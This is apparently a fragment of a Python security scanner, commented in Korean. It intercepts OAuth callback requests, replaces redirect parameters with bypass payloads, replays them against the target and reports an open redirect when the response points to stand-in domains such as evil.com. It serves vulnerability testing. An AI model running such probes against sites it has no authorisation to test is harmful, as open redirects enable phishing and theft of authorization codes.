def _extract_code_from_location(self, location: str) -> str:
if not location:
return ""
try:
parsed = urlparse(location)
query = parse_qs(parsed.query)
return query.get('code', [''])[0]
except:
return ""
"""진짜 redirect 파라미터인지 판단"""
def _is_real_redirect_param(self, param_name, param_value):
# redirect_uri 제거하고 클라이언트 앱 파라미터들만
obvious_redirect_params = [
"next", "return_to", "redirect", "redirect_url",
"continue", "goto", "destination", "forward",
"callback_url", "back"
]
if param_name in obvious_redirect_params:
return True
# 모호한 파라미터는 값으로 판단
ambiguous_params = ["url", "target", "link", "state"]
if param_name in ambiguous_params:
if (param_value.startswith(('http', '/', '.')) or
'/' in param_value or
len(param_value) > 15):
return True
return False
def _is_oauth_request_worth_testing(self, url, parsed, query):
"""OAuth 콜백 완료 후 클라이언트 앱 테스트"""
# OAuth 제공자 도메인은 제외
oauth_provider_domains = [
"accounts.google.com",
"www.facebook.com",
"github.com",
"login.microsoftonline.com"
]
# OAuth 제공자 요청은 스킵
if any(provider in parsed.netloc for provider in oauth_provider_domains):
print(f"[DEBUG] ❌ OAuth 제공자 요청 - 클라이언트 테스트 대상 아님: {parsed.netloc}")
return False
# 클라이언트 앱의 OAuth 콜백/로그인 경로들
oauth_callback_paths = [
"/auth/callback", "/oauth/callback", "/login/callback",
"/auth", "/login", "/sso", "/signin", "/callback"
]
has_oauth_path = any(path in parsed.path for path in oauth_callback_paths)
if not has_oauth_path:
return False
# OAuth 성공 파라미터 확인
oauth_success_params = ["code", "access_token", "id_token"]
has_oauth_success = any(param in query for param in oauth_success_params)
# redirect 관련 파라미터 확인
redirect_params = ["next", "return_to", "redirect", "redirect_url", "continue", "goto", "state"]
has_redirect_param = any(param in query for param in redirect_params)
if has_oauth_path and (has_oauth_success or has_redirect_param):
print(f"[DEBUG] 🎯 클라이언트 OAuth 콜백/로그인 URL 감지!")
print(f"[DEBUG] Host: {parsed.netloc}")
print(f"[DEBUG] Path: {parsed.path}")
print(f"[DEBUG] OAuth success: {has_oauth_success}")
print(f"[DEBUG] Has redirect: {has_redirect_param}")
return True
return False
""" Open Redirect 탐지 로직 - 요청 감지 단계 """
async def test(self, flow: http.HTTPFlow):
url = flow.request.pretty_url
parsed = urlparse(url)
query = parse_qs(parsed.query)
# GET 요청만 처리
if flow.request.method != "GET":
return
# OAuth 요청인지 먼저 확인 (API 검증 전에)
if not self._is_oauth_request_worth_testing(url, parsed, query):
return # OAuth 요청이 아니면 바로 종료
# 이미 이 타겟을 테스트 중인지 확인
target_key = f"{parsed.netloc}"
if target_key in self.testing_targets:
print(f"[OAUTH_SKIP] 이미 {target_key} 테스트 진행 중 - 중복 테스트 방지")
return
# 테스트 시작 표시
self.testing_targets.add(target_key)
try:
print(f"[CLIENT_TARGET] 🎯 클라이언트 앱 Open Redirect 테스트 대상: {parsed.netloc}")
# redirect 파라미터가 있는지 확인
redirect_param = None
original_redirect_value = None
# 클라이언트 앱 파라미터들만 체크
redirect_params = [
"next", "return_to", "redirect", "redirect_url",
"continue", "goto", "destination", "callback_url",
"forward", "state" # state도 리다이렉트용으로 쓰이기도 함
]
for param in redirect_params:
if param in query:
value = query[param][0]
if self._is_real_redirect_param(param, value):
redirect_param = param
original_redirect_value = value
break
if not redirect_param:
print(f"[OAUTH_SKIP] redirect 파라미터 없음 - 테스트 건너뛰기")
return
print(f"[OPEN_REDIRECT] 파라미터: {redirect_param}={original_redirect_value}")
print(f"[OPEN_REDIRECT] 총 우회 패턴: {len(self.bypass_payloads)}")
print("-" * 50)
redirect_limiter.reset_for_new_target()
tested_count = 0
success_count = 0
# 모든 우회 패턴 테스트
for payload in self.bypass_payloads:
try:
print(f"[{tested_count+1:2d}/{len(self.bypass_payloads)}] {payload.name}", end=" ... ")
result = await self._test_bypass_pattern(
url, query, parsed, original_redirect_value, payload, redirect_param, headers={}
)
tested_count += 1
if result:
success_count += 1
print("🚨 VULNERABLE!")
else:
print("")
except Exception as e:
print(f"❌ ERROR: {e}")
tested_count += 1
continue
print("-" * 50)
print(f"[OPEN_REDIRECT] ✅ 테스트 완료!")
if success_count > 0:
print(f"[OPEN_REDIRECT] 🚨 Open Redirect 취약점: {success_count}")
else:
print(f"[OPEN_REDIRECT] ✅ 취약점 없음")
finally:
# 테스트 완료 후 제거
self.testing_targets.discard(target_key)
""" 우회 URL 생성 및 요청 전송 """
async def _test_bypass_pattern(self, original_url, query, parsed_url, original_redirect_value, payload, redirect_param, headers):
# 레이트 리미팅 체크 추가
can_proceed = await redirect_limiter.wait_if_needed(payload.name)
if not can_proceed:
return False
try:
# 원본 redirect 값에 우회 패턴 적용
if original_redirect_value.startswith('http'):
# 이미 완전한 URL인 경우
bypassed_redirect = payload.mutate(original_redirect_value)
else:
# 상대 경로인 경우 완전한 URL로 만들어서 우회
full_original = f"https://{original_redirect_value}"
bypassed_redirect = payload.mutate(full_original)
# 새로운 쿼리 구성
modified_query = query.copy()
modified_query[redirect_param] = [bypassed_redirect] # 동적 파라미터명
new_query_string = urlencode(modified_query, doseq=True)
test_url = urlunparse(parsed_url._replace(query=new_query_string))
# 요청 전송
response = await self._send_request(test_url, headers)
# Open Redirect 응답 분석
result = await self._analyze_response(
original_url, test_url, bypassed_redirect, response, payload
)
return result
except Exception as e:
print(f"[ERROR] {payload.name} 테스트 실패: {e}")
return False
""" Open Redirect 전용 응답 분석 """
async def _analyze_response(self, original_url, test_url, bypassed_redirect, response, payload):
status = response['status']
location = response['location']
# 리다이렉트 응답인지 확인
if status not in [301, 302, 303, 307, 308]:
return False
if not location:
return False
# 악성 도메인으로 리다이렉트되었는지 확인
if self._is_redirected_to_malicious_domain(location):
print(f"[🎯 VULNERABILITY] {payload.name} Open Redirect 성공!")
print(f"[CRITICAL] 악성 도메인으로 리다이렉트: {location}")
await self._report_open_redirect_vulnerability(
original_url, test_url, bypassed_redirect,
location, payload
)
return True
return False
def _is_redirected_to_malicious_domain(self, location: str) -> bool:
"""실제로 악성 도메인으로 리다이렉트되었는지 확인"""
print(f"[DEBUG] 리다이렉트 분석: {location}")
try:
location_parsed = urlparse(location)
location_host = location_parsed.hostname
# 실제 호스트만 확인 (URL 파라미터는 무시)
if not location_host:
return False
# Facebook 자체 도메인이면 취약점 아님
facebook_domains = ["www.facebook.com", "facebook.com", "m.facebook.com"]
if any(fb_domain in location_host.lower() for fb_domain in facebook_domains):
print(f"[DEBUG] ❌ Facebook 내부 페이지로 리다이렉트 - 취약점 아님")
return False
# 실제 악성 도메인들만 체크
malicious_domains = ["evil.com", "attacker.com", "malicious.site"]
if any(domain in location_host.lower() for domain in malicious_domains):
print(f"[DEBUG] ✅ 실제 악성 도메인으로 리다이렉트!")
return True
return False
except Exception as e:
print(f"[DEBUG] 파싱 에러: {e}")
return False
""" 취약점 보고서 생성 """
async def _report_open_redirect_vulnerability(self, original_url, test_url,
bypassed_redirect, location, payload):
"""Open Redirect 취약점 보고서 생성"""
pattern_name = payload.name if hasattr(payload, 'name') else str(payload)
pattern_description = payload.description if hasattr(payload, 'description') else "Unknown bypass pattern"
description = (
f"Open Redirect 취약점 발견!\n\n"
f"-- 상세 정보 --:\n"
f"• 우회 패턴: {pattern_name}\n"
f"• 설명: {pattern_description}\n"
f"• 원본 URL: {original_url}\n"
f"• 우회된 redirect 값: {bypassed_redirect}\n"
f"• 테스트 URL: {test_url}\n"
f"• 실제 리다이렉트 위치: {location}\n\n"
f"🚨 이 취약점을 이용하면 피싱 공격이 가능합니다!\n"
)
report_vuln(
title="Open Redirect Vulnerability",
desc=description,
status="MEDIUM", # Open Redirect는 보통 Medium
uri=test_url
)
print(f"[🎯 MEDIUM] Open Redirect 취약점 발견 및 보고 완료!")
print(f"[INFO] 패턴: {pattern_name}, 리다이렉트: {location}")
# TODO: 우리가 탐지하는 IdP가 제한적이기 때문에 각 IdP의 uri 패턴을 탐지하는 것도 좋아보임
# Loaction 헤더에 담긴 인가 코드 뿐만 아니라, script나 다른 방식으로도 인가 코드가 전달될 수 있음